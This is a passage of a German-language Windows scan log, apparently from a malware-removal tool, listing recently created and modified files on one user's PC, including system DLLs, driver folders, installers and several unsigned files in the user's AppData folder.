2016-09-27 13:01 - 2016-09-27 13:01 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\container.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00225280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_G18030.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00168800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00118112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00114192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MapControls.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MapControls.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinelsa.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00079536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00073568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappprxy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapstoasttask.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceassociation.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\encapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\delegatorprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi_passthru.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020320 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_IS2022.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\c_GSM7.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosTrace.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosHost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6r.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlStringsRes.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll
2016-09-27 12:57 - 2016-09-27 12:57 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files\MSBuild
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-09-27 12:55 - 2016-09-27 12:55 - 00199008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys
2016-09-27 12:55 - 2016-05-25 15:31 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 15:31 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 15:31 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-09-27 12:55 - 2016-05-25 12:03 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 12:03 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 12:03 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Verlauf
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 ____D C:\ProgramData\USOShared
2016-09-27 12:22 - 2016-09-27 12:23 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2016-09-27 12:22 - 2016-09-27 12:23 - 00007623 _____ C:\WINDOWS\diagerr.xml
2016-09-27 12:21 - 2016-10-17 13:12 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-09-27 12:21 - 2016-09-27 12:22 - 00002824 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task
2016-09-27 12:18 - 2016-09-27 12:18 - 00022960 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-09-27 12:14 - 2016-09-27 12:14 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-09-27 12:13 - 2016-09-27 12:14 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-09-27 12:11 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Vorlagen
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Startmenü
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Netzwerkumgebung
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Lokale Einstellungen
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Eigene Dateien
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Druckumgebung
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Local\Verlauf
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Local\Anwendungsdaten
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Anwendungsdaten
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\ProgramData\AMD
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\Program Files\ATI Technologies
2016-09-27 12:09 - 2016-07-16 13:41 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2016-09-27 12:08 - 2016-09-27 12:09 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____D C:\Program Files\AMD
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2016-09-27 12:06 - 2016-10-17 13:12 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-09-27 12:06 - 2016-09-27 12:15 - 00194296 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-09-27 12:06 - 2016-09-27 12:06 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2016-09-23 18:29 - 2016-10-14 17:56 - 00000000 ____D C:\Program Files (x86)\Funfair Machines
2016-09-23 18:28 - 2016-09-23 18:28 - 102292196 _____ () C:\Users\maikp\Downloads\Funfair-Machines-Break-Dance-No.1-V1.1-Setup.exe
2016-09-22 06:53 - 2016-09-22 06:53 - 00040555 _____ C:\Users\maikp\OneDrive\Documents\mewtwo.pdf
2016-09-21 17:50 - 2016-09-21 17:50 - 01233928 _____ (Nod ) C:\Users\maikp\Downloads\FlashPlayerPro.exe
2016-09-21 06:51 - 2016-09-27 12:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Usenet.nl
2016-09-21 06:51 - 2016-09-21 15:21 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Usenet.nl
2016-09-21 06:51 - 2016-09-21 15:19 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Usenet.nl
2016-09-21 06:51 - 2016-09-21 06:51 - 00000000 ____D C:\Program Files (x86)\Usenet.nl
2016-09-21 06:50 - 2016-09-21 06:51 - 07457256 _____ ( ) C:\Users\maikp\Downloads\UsenetNLSetup_428537f.exe
2016-09-20 17:57 - 2016-09-20 17:57 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Skype
2016-09-18 09:38 - 2016-09-18 09:41 - 00000000 ____D C:\Users\maikp\AppData\Roaming\.minecraft
2016-09-18 09:38 - 2016-09-18 09:38 - 00000000 ____D C:\Users\maikp\AppData\Roaming\java
2016-09-18 09:37 - 2016-09-18 09:37 - 02314240 _____ C:\Users\maikp\Downloads\MinecraftInstaller.msi
2016-09-18 08:50 - 2016-09-18 09:12 - 209715200 _____ C:\Users\maikp\Downloads\ZRJHBDFSWDEWE.part02.rar
2016-09-18 08:15 - 2016-09-18 09:07 - 209715200 _____ C:\Users\maikp\Downloads\ZRJHBDFSWDEWE.part01.rar
2016-09-18 08:11 - 2016-07-27 21:25 - 00504488 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-09-18 08:10 - 2016-09-18 08:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-09-18 08:09 - 2016-09-18 08:10 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-09-18 08:08 - 2016-09-18 08:08 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Macromedia
2016-09-18 08:03 - 2016-10-07 20:57 - 00000120 ____R C:\Users\maikp\OneDrive\Documents\Eigenes Notizbuch.url
2016-09-18 08:03 - 2016-09-18 08:06 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\MEGAsync Downloads
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\steuer
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\RCT3
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Mobizen
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\MEGAsync
2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Camtasia Studio
2016-09-18 08:02 - 2016-09-18 08:04 - 00000000 ____D C:\Users\maikp\AppData\Local\MicrosoftEdge
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Vorlagen
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Startmenü
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Netzwerkumgebung
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Lokale Einstellungen
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Eigene Dateien
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Druckumgebung
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\AppData\Local\Verlauf
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\AppData\Local\Anwendungsdaten
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Users\Default.migrated\Anwendungsdaten
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Programme
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Vorlagen
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Startmenü
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programme
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Dokumente
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\ProgramData\Anwendungsdaten
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Program Files\Gemeinsame Dateien
2016-09-18 05:52 - 2016-09-18 05:52 - 00000000 _SHDL C:\Dokumente und Einstellungen
2016-09-18 05:51 - 2016-10-14 19:26 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-09-18 05:47 - 2016-09-27 12:08 - 00000000 ____D C:\AMD
2016-09-17 21:41 - 2016-09-17 21:41 - 00000000 _____ C:\Recovery.txt
2016-09-17 21:08 - 2016-10-17 13:17 - 00000000 ___RD C:\Users\maikp\OneDrive
2016-09-17 21:08 - 2016-09-27 15:31 - 00002394 _____ C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-09-17 21:07 - 2016-09-18 09:41 - 00000000 ____D C:\Users\maikp\AppData\Local\AMD
2016-09-17 21:07 - 2016-09-17 21:07 - 00000000 ____D C:\Users\maikp\AppData\Roaming\ATI
2016-09-17 21:07 - 2016-09-17 21:07 - 00000000 ____D C:\Users\maikp\AppData\Local\ATI
2016-09-17 21:07 - 2016-09-17 21:07 - 00000000 ____D C:\ProgramData\ATI
2016-09-17 21:06 - 2016-09-18 08:38 - 00000000 ____D C:\Users\maikp\AppData\Local\Comms
2016-09-17 21:06 - 2016-09-17 21:06 - 00000000 ____D C:\Users\maikp\AppData\Local\ActiveSync
2016-09-17 21:05 - 2016-09-18 08:14 - 00000000 ____D C:\Users\maikp\AppData\Local\PackageStaging
2016-09-17 21:05 - 2016-09-17 21:05 - 00000000 ____D C:\Users\maikp\AppData\Local\Publishers
2016-09-17 21:04 - 2016-10-14 17:55 - 00000000 ____D C:\Users\maikp\AppData\Local\VirtualStore
2016-09-17 21:04 - 2016-10-14 17:53 - 00000000 ____D C:\Users\maikp\AppData\Local\Packages
2016-09-17 21:04 - 2016-10-01 19:22 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-09-17 21:04 - 2016-09-17 21:04 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Adobe
2016-09-17 21:04 - 2016-09-17 21:04 - 00000000 ____D C:\Users\maikp\AppData\Local\TileDataLayer
2016-09-17 20:56 - 2016-10-17 13:22 - 01672382 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-09-17 18:55 - 2016-09-27 12:21 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicyUsers
2016-09-17 18:55 - 2016-09-27 12:17 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2016-09-17 18:55 - 2016-09-17 18:55 - 00000000 ____D C:\WINDOWS\system32\GroupPolicy
2016-09-17 18:55 - 2016-09-17 18:53 - 00017463 _____ C:\WINDOWS\system32\Drivers\etc\services
2016-09-17 18:55 - 2016-09-17 18:53 - 00001358 _____ C:\WINDOWS\system32\Drivers\etc\protocol
2016-09-17 18:55 - 2016-09-17 18:53 - 00000407 _____ C:\WINDOWS\system32\Drivers\etc\networks
2016-09-17 18:55 - 2016-09-17 18:53 - 00000219 _____ C:\WINDOWS\system.ini
2016-09-17 18:55 - 2016-09-17 18:53 - 00000092 _____ C:\WINDOWS\win.ini
2016-09-17 18:36 - 2016-09-27 12:14 - 00000000 ____D C:\Users\Default.migrated

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-10-17 13:22 - 2016-07-17 00:51 - 00606284 _____ C:\WINDOWS\system32\perfh007.dat
2016-10-17 13:22 - 2016-07-17 00:51 - 00120056 _____ C:\WINDOWS\system32\perfc007.dat
2016-10-14 20:45 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\System
2016-10-14 19:27 - 2016-07-16 08:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2016-10-14 18:39 - 2016-07-16 13:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-14 17:53 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-14 17:53 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-09 07:59 - 2016-08-11 15:06 - 00065344 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\cherimoya.sys
2016-10-05 16:48 - 2016-07-16 13:45 - 00000000 ____D C:\WINDOWS\INF
2016-10-03 18:19 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\rescache
2016-10-02 18:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\setup
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Provisioning
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-09-28 06:08 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\appcompat
2016-09-27 15:27 - 2016-07-16 13:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-09-27 13:05 - 2016-07-16 13:47 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\dsc
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ___RD C:\Program Files\Windows Defender
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\et-EE
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\es-MX
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\en-GB
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2016-09-27 12:56 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2016-09-27 12:56 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\MUI
2016-09-27 12:24 - 2016-07-16 13:47 - 00000000 ____D C:\ProgramData\USOPrivate
2016-09-27 12:24 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows NT
2016-09-27 12:23 - 2016-07-16 08:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-09-27 12:22 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-09-27 12:22 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Registration
2016-09-27 12:17 - 2016-07-16 13:47 - 00000000 __RHD C:\Users\Public\Libraries
2016-09-27 12:13 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\spool
2016-09-27 12:09 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\PrintDialog
2016-09-27 12:08 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\MiracastView

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-10-08 20:52 - 2016-10-08 20:52 - 7176704 _____ () C:\Users\maikp\AppData\Roaming\agent.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 0070704 _____ () C:\Users\maikp\AppData\Roaming\Config.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0190394 _____ () C:\Users\maikp\AppData\Roaming\Doublephase.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 0015792 _____ () C:\Users\maikp\AppData\Roaming\InstallationConfiguration.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0140288 _____ () C:\Users\maikp\AppData\Roaming\Installer.dat
2016-10-08 20:52 - 2016-10-08 20:51 - 0693760 _____ () C:\Users\maikp\AppData\Roaming\KeyApphase.exe
2016-10-08 20:52 - 2016-10-08 20:52 - 1928315 _____ () C:\Users\maikp\AppData\Roaming\KeyApphase.tst
2016-10-08 20:52 - 2016-10-08 20:52 - 0018432 _____ () C:\Users\maikp\AppData\Roaming\Main.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 0005568 _____ () C:\Users\maikp\AppData\Roaming\md.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0126464 _____ () C:\Users\maikp\AppData\Roaming\noah.dat
